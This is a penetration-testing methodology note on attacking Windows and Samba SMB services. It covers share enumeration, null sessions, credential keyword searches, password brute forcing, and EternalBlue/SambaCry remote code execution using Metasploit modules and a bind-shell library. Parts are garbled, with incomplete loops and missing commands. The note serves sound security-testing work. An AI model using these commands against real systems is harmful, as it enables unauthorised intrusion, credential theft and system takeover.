445 - SMB

SMB - Methodology


In a Windows environment, the Server Message Block (SMB) protocol is used to share folders and files between computers. Sensible information can be stored in shares accessible to unauthenticated users (NULL or GUEST session).

The SMB protocol has also been vulnerable to critical vulnerabilities, such as MS17-010, allowing for privileged system command execution.

Network scan

nmap and nbtscan can be used to scan the network for SMB services and exposed shares:

nmap -v -p 445 -sV -sC -oA nmap_smb <RANGE | CIDR>
nbtscan -r <RANGE>


The nmap smb-os-discovery.nse script attempts to determine the operating system, computer name, domain, workgroup, and current time over the SMB protocol.

nmap --script smb-os-discovery.nse -p 445 <HOST>
nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 <HOST>

Null session and guest access

A null session refers to an unauthenticated NetBIOS session and allows unauthenticated access to the shared files as well as a large amounts of information about the machine, such as password policies, usernames, group names, machine names, user and host SIDs. This Microsoft feature existed in SMB1 by default and was later restricted in subsequent versions of SMB.

To detect and retrieve information about the machine through a null session, the enum4linux Perl / enum4linux-ng.py Python scripts as well as the smbmap can be used.

enum4linux being outdated, enum4linux-ng.py is recommended as the go to tool. In addition to enumerating the exposed shares, it will also perform MSRPC calls (using mainly nmblookup, net, rpcclient and smbclientto) to enumerate users, groups, password policy information, etc. For more information, refer to the [L7] MSRPC note.

Note that if the null session test if being performed from a domain-joined system, the current user and computer account can be implicitly used for the connection if a null authentication is not explicitly specified.

smbmap -H <HOSTNAME | IP>
smbmap -u "Guest" -H <HOSTNAME | IP>
smbmap -u "Invité" -H <HOSTNAME | IP>

enum4linux-ng.py -A -R <HOSTNAME | IP>
enum4linux <HOSTNAME | IP>

crackmapexec smb <HOSTNAME | IP> -u "" -p "" [--shares | -M spider_plus]

Standalone binaries of smbmap, enum4linux-ng, and CrackMapExec for Linux (Windows for CrackMapExec) are available on the following OffensivePythonPipeline GitHub repository.

The following quick bash script can be used to combine a network scan and null session enumeration:

nbtscan -s ' ' <RANGE> | cut -d ' ' -f 1 | while read -r line ; do
  smbmap -H $line > smbmap_$line.txt

Authenticated recon

enum4linux-ng.py additionally supports authenticated queries:

enum4linux-ng.py -u "<USERNAME>" -pw "<PASSWORD>" -A -R <HOSTNAME | IP>

List accessible shares

Multiples tools can, and should, be used to list the shares available on the targeted server. Different tools may held different results depending of the system targeted.

If no credentials are provided, a null session will be attempted.

Note that the following tools may be able to retrieve different results. It is not unusual to be able to list the shares using one tool while the others could not retrieve the same information.

# If no username provided, null session assumed.
smbmap [-d <WORKGROUP | DOMAIN>] [-u <USERNAME>] [-p <PASSWORD | HASH>] (-H <HOSTNAME | IP> | --host-file <FILE>)
interlace -c "smbmap [-d <WORKGROUP | DOMAIN>] [-u <USERNAME>] [-p <PASSWORD | HASH>] -H _target_ 2>&1 > smbmap_output__cleantarget_.txt" [-t <CIDR_RANGE> | -tL <CIDR_RANGES_FILE>]

# nmap smb-enum-shares script will attempt to retrieve the file system path of the share.
nmap -v -sT -p 139,445 --script smb-enum-shares.nse <HOSTNAME | IP>
nmap -v -sU -sT -p U:137,T:139,445 --script smb-enum-shares.nse <HOSTNAME | IP>
nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-enum-shares --script-args smbdomain=<DOMAIN/WORKGROUP>,smbusername=<USERNAME>,smbpassword=<PASSWORD>
nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-enum-shares --script-args smbdomain=<DOMAIN/WORKGROUP>,smbusername=<USERNAME>,smbhash=<HASH>

crackmapexec <HOSTNAME | IP> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> [--shares | -M spider_plus]
crackmapexec <HOSTNAME | IP> -d <DOMAIN> -u <USERNAME> -H <HASH> [--shares | -M spider_plus]

msf > use auxiliary/scanner/smb/smb_enumshares

smbclient -U "" -N -L \\<HOSTNAME | IP>
# Some Windows servers do not support IP only and require the NetBIOS name to be specified.
smbclient -U "" -N -L \\<HOSTNAME> -I <IP>
# To authenticate as the specifed user. --pw-nt-hash to specify an NT hash instead of a cleartext password.
smbclient -U '<WORKGROUP | DOMAIN>\<USERNAME>' [--pw-nt-hash] -L \\<HOSTNAME | IP>

# Using the  Windows built-in net utility.
net view \\<HOSTNAME | IP> /all

The SoftPerfect's' NetScan Windows graphical network scanner utility can be used to conduct IPv4 and IPv6 hosts discovery and network shares enumeration. NetScan integrates with the Windows built-in network share explorer and drive mapping functionalities. For more information, refer to the General - Ports scan note.

Retrieve shared files or directories ACL

The Windows icals and the Linux smbcacls utilities as well as the PowerShell cmdlet Get-Acl can be used to retrieve the detailed ACL of shared files and directories.

Note that smbcacls follows the same options input as smbclient.

Unitary file / directory ACL retrieval:

smbcacls -N "\\\\<HOSTNAME | IP>\\<SHARE>" <FILE | DIRECTORY>
smbcacls -U <USERNAME> [--pw-nt-hash] "\\\\<HOSTNAME | IP>\\<SHARE>" <FILE | DIRECTORY>

# runas /user:Guest /Netonly powershell.exe

The following one-liner can be used on a Linux system to retrieve the ACL of a mounted share:

# Files and directories in the specified share, with an eventual specified directory.
# If no directory is specified, the share UNC path shouldn't end with a backslash (example of a valid path: '\\<HOSTNAME>\<SHARE>').

for i in $(/bin/ls /mnt/<LOCAL_MOUNT_POINT>[/<DIRECTORY>]); do echo "\n$i"; smbcacls -N '\\<HOSTNAME>\<SHARE>[\<DIRECTORY>]' $i 2>/dev/null; done

# Recursively retrieve the ACL of all files and directories in the specified share or directory
for i in $(/usr/bin/find *); do echo "\n$i"; smbcacls -N '\\<HOSTNAME>\<SHARE>[\<DIRECTORY>]' $i; done

The following PowerShell one-liner can be used to recursively retrieve the ACL of all files and directories in a share:

Get-ChildItem "\\"\\<HOSTNAME | IP>\<SHARE>" -Recurse | Get-ACL | Select-Object Path, Owner, AccessToString, Group | Format-List

List, search and download files

Similarly as for shares listing, multiples tools can be used to access an exposed share.

smbmap provides files searching capabilities and automatic download of files matching the search criteria.

If no credentials are provided, a null session will be attempted.

smbmap [-d <WORKGROUP | DOMAIN>] [-u <USERNAME>] [-p <PASSWORD | NTLM_HASH>] -R <SHARE> (-H <HOSTNAME | IP> | --host-file <INPUT_FILE>)
smbmap [-d <WORKGROUP | DOMAIN>] [-u <USERNAME>] [-p <PASSWORD | NTLM_HASH>] -F <PATTERN> (-H <HOSTNAME | IP> | --host-file <INPUT_FILE>)

nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-enum-shares,smb-ls --script-args maxdepth=-1
nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-ls --script-args share=<SHARE>,maxdepth=-1
nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-enum-shares,smb-ls --script-args smbdomain=<DOMAIN/WORKGROUP>,smbusername=<USERNAME>,smbpassword=<PASSWORD>,maxdepth=-1
nmap -v -sT -p 139,445 <HOSTNAME | IP> --script smb-enum-shares,smb-ls --script-args smbdomain=<DOMAIN/WORKGROUP>,smbusername=<USERNAME>,smbhash=<HASH>,maxdepth=-1

crackmapexec <HOSTNAME | IP> -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -shares <SHARE> --spider
crackmapexec <HOSTNAME | IP> -d <DOMAIN> -u <USERNAME> -H <HASH> -shares <SHARE> --spider

msf > use auxiliary/scanner/smb/smb_enumshares
set ShowFiles true
set SpiderShares true

smbmap, metasploit and smbget can be used to download, upload or delete a specific file:

smbmap [-d <WORKGROUP | DOMAIN>] [-u <USERNAME>] [-p <PASSWORD | NTLM_HASH>] --download/--upload/--delete <PATH> (-H HOSTNAME | IP | --host-file <INPUT_FILE>)

msf > use auxiliary/admin/smb/download_file

smbget -a -R smb://<HOSTNAME | IP>/<SHARE>

Interactive smbclient

The Linux smbclient CLI tool can be used to interact with the a SMB or SAMBA share:

# NULL bind
smbclient -U "" -N "\\\\<HOSTNAME | IP>\\<SHARE>"

# To authenticate as USERNAME
smbclient [-W <WORKGROUP | DOMAIN>] -U "" "\\\\<HOSTNAME | IP>\\<SHARE>"

# --pw-nt-hash: specify an NT hash instead of a cleartext password.
smbclient -U '<WORKGROUP | DOMAIN>\<USERNAME>' [--pw-nt-hash] "\\\\<HOSTNAME | IP>\\<SHARE>"

The following basic commands can be used through the client (partial list):

# Display the file to stdout

# Download a file from the remote system

# Upload a file to the remote system

# Change directory
# Remote system directory
# Local system directory

# Directory listing
# Remote system directory
# Local system directory

# Show all available info on a file (create time, change time, etc.)
allinfo <FILE>

Alternatively, impacket's smbclient.py can be used as well:

# To connect to the remote server.

# NTLM authentication
smbclient.py [-target-ip <TARGET_IP>] [-port [<PORT>]] [<DOMAIN>/]<USERNAME>[:<PASSWORD>]@<HOSTNAME | IP>
smbclient.py -hashes <LM_HASH:NT_HASH> [-target-ip <TARGET_IP>] [-port [<PORT>]] [[<DOMAIN>/]<USERNAME>@<HOSTNAME | IP>

# Kerberos authentication
smbclient.py -k -no-pass -dc-ip <DC_IP> <HOSTNAME>

The following basic commands can be used through smbclient.py (partial list):

# Lists the available shares.

# Connects to the specified share.

# Lists the files and directories in the current working directory (on remote).
ls [<REGEX>]

# Changes the current directory to the specified path.
cd <PATH>

Then commands can be used





*** Unknown syntax: dir


drw-rw-rw- 0 Mon Aug 16 02:55:31 2021 . drw-rw-rw- 0 Mon Aug 16 02:55:31 2021 .. drw-rw-rw- 0 Wed Jun 29 08:51:48 2022 bycn.bouygues-construction.com

###### Recursive download of shared files

The `smbget` and `smbclient` utilities on Linux and the `PowerShell`
`Copy-Item` cmdlet on Windows can be used to recursively upload or download a
network share directories and files.


Supports recursive download

smbget --guest -n -R smb://<IP | HOSTNAME>/ smbget [-w ] -U <USERNAME[%]> smb://<IP | HOSTNAME>/

smbclient session - supports both recursive download and upload

mask "" recurse ON prompt OFF cd '<PATH_REMOTE_DIR>' lcd '<PATH_LOCAL_DIR>' mput / mget *


Supports recursive download

Copy-Item -Recurse -Force -Verbose -Path '\<IP | HOSTNAME><SHARE>' -Destination <OUTPUT_DIR>

###### Mount shares

The share may also be mounted using the Linux `mount` utility tool (replacement
of smbmount):

ro for read only and rw for read & write

guest / no username for null session or specify an user with username=

vers=1.0 if any error arise

mount -t cifs //<HOSTNAME | IP>// /mnt/ -o rw,guest,vers=1.0 mount -t cifs //<HOSTNAME | IP>// /mnt/ -o rw,username=,password=,vers=1.0

In case of error: "mount error(112): Host is down", SMBv2 must be used

mount -t cifs //<HOSTNAME | IP>// /mnt/ -o rw,user=Guest,vers=2.0 mount -t cifs //<HOSTNAME | IP>// /mnt/ -o rw,user=,password=,vers=2.0

From a Windows system, the `net` bultin can be used:

NULL session share mapping.

net use : \<HOSTNAME | IP><SHARE> "" /user:""

Authenticated share mapping.


###### Distributed shares searching

*Agent Ransack*

The `Agent Ransack` GUI file searching tool can be used to conduct `grep` like
searches using the current Windows user identity and access rights. Both file
names or content can be searched, and one or multiple local or remote locations
may be specified.

`Agent Ransack` presents the advantage of displaying 4 lines surrounding the
hits and allowing easy access to files through the Windows explorer and any
other application defined in the context menu of the local system.

The tool supports regex use, such as follow:


Keywords search example.

pass OR secret OR pwd OR SecureString OR NetworkCredential OR credential OR Authorization: Basic OR key OR root:$ OR <DOMAIN_NAME>


[`Snaffler`](https://github.com/SnaffCon/Snaffler) is a C# utility to enumerate
and search sensitive data (mostly credentials) in a Active Directory
environment. `Snaffler` can also be used to search on a local filesystem.

`Snaffler` bundles a number of detection rules, detecting:
  - specific file extensions (such as `.vmdk`, `.vhdx`, `.kdbx`, `.ppk`, etc.)
  - exact file names (such as `id_rsa`, `shadow`, `NTDS.DIT`, etc.)
  - partial file names containing substring such as `secret`, `password`, etc.
  - sensitive content (such as `password`, `connectionString`, etc.) in
    text-based (by default) files.

More information on how `Snaffler` detect sensitive information can be found
on the project repository `README`.

# -s: Displays hits to stdout.
# -m <OUTPUT_DIR>: Automatically download matching files in the specified directory.
# -l <SIZE>: Limit the size of files in bytes to download. Defaults to 10MB (10485760 bytes).
# -u: Retrieve a list of interesting-looking accounts from the domain and uses them in searches.
# -r <XXXMB | SIZE>: Set the maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k (524288 bytes).

# Enumerates computers and searches for files in the specified Active Directory domain.
Snaffler.exe [-s | -o <OUTPUT_PATH>] [-m <OUTPUT_DIR> [-l <SIZE>]] -u -r "<100000000 | SIZE>" -d <DOMAIN> -c <DC_IP | DC_HOSTNAME>

# Targets the specified computer(s).
Snaffler.exe [-s | -o <OUTPUT_PATH>] [-m <OUTPUT_DIR> [-l <SIZE>]] -u -r "<100000000 | SIZE>" -n <COMPUTER | COMPUTERS_LIST>

# Searches in the specified local folder.
Snaffler.exe [-s | -o <OUTPUT_PATH>] [-m <OUTPUT_DIR> [-l <SIZE>]] -u -r "<100000000 | SIZE>" -i <LOCAL_FOLDER>

Authentication brute force

The patator tool can be used to brute force credentials on the service:

patator smb_login host=<HOSTNAME | IP> user=FILE0 password=FILE1 0=<WORDLIST_USER> 1=<WORDLIST_PASSWORD> -x ignore:fgrep='NT_STATUS_LOGON_FAILURE'

Known vulnerabilities / CVE

Multiple known vulnerabilities affect the SMB protocol, that could allow if unpatched unauthenticated Remote Code Execution.


nmap can be used to check for the following exploits:

smb-vuln-ms17-010 / cve-2017-7494

nmap -v -p 139,445 --script=vuln <HOSTNAME | IP | CIDR>

Symlink Directory Traversal


  • Samba before 3.3.11, 3.4.x before 3.4.6, and 3.5.x before 3.5.0rc3

  • A writable share

Use the metasploit module auxiliary/admin/smb/samba_symlink_traversal to exploit a directory traversal flaw and create a directory that will link to the root filesystem.


EternalBlue & SambaCry detection and exploitation

A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. Write access to the exposed share is required. Successful exploitation result in a SYSTEM shell from an authenticated access.

Detect vulnerability

The nmap smb-vuln-ms17-010.nse and smb-vuln-cve-2017-7494 scripts attempt to detect if a SMBv1 server is vulnerable to the remote code execution vulnerability MS17-010, a.k.a. EternalBlue (vulnerability exploited by WannaCry and Petya ransomware) or CVE-2017-7494 aka SambaCry.

The Metasploit auxiliary/scanner/smb/smb_ms17_010 module can be used as well (supports host(s), range CIDR identifier, or hosts file).

msf> use auxiliary/scanner/smb/smb_ms17_010
# set RHOSTS file:<PATH>

# EternalBlue
nmap --script smb-vuln-ms17-010.nse -p 445 <HOSTNAME | IP | CIDR>

# SambaCry
nmap --script smb-vuln-cve-2017-7494 -p 445 <HOSTNAME | IP | CIDR>
nmap --script smb-vuln-cve-2017-7494 --script-args smb-vuln-cve-2017-7494.check-version -p 445 <HOSTNAME | IP | CIDR>

If no share is available to unauthenticated users, the server may still be vulnerable for authenticated users, meaning finding credentials would lead to RCE. The following versions are vulnerable:

# EternalBlue

# SambaCry
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4


The following exploit may be used to achieve RCE through the EternalBlue vulnerability on Windows hosts:

# Windows 7 and Server 2008 R2 (x64) All Service Packs
msf> use exploit/windows/smb/ms17_010_eternalblue

# Windows NT 5.0 / 5.1 / 5.2 (Windows 2000 / Windows XP & Windows Server 2003)
# https://github.com/helviojunior/MS17-010
python send_and_execute.py <HOSTNAME | IP> <BINARY>


The following exploit may be used to achieve RCE through the SambaCry vulnerability on Linux hosts:

# Source

# Usage

# The libbindshell-samba.so of the repository can be used to get a bind shell on the server :
# -e libbindshell-samba.so -r <SHARE>/libbindshell-samba.so



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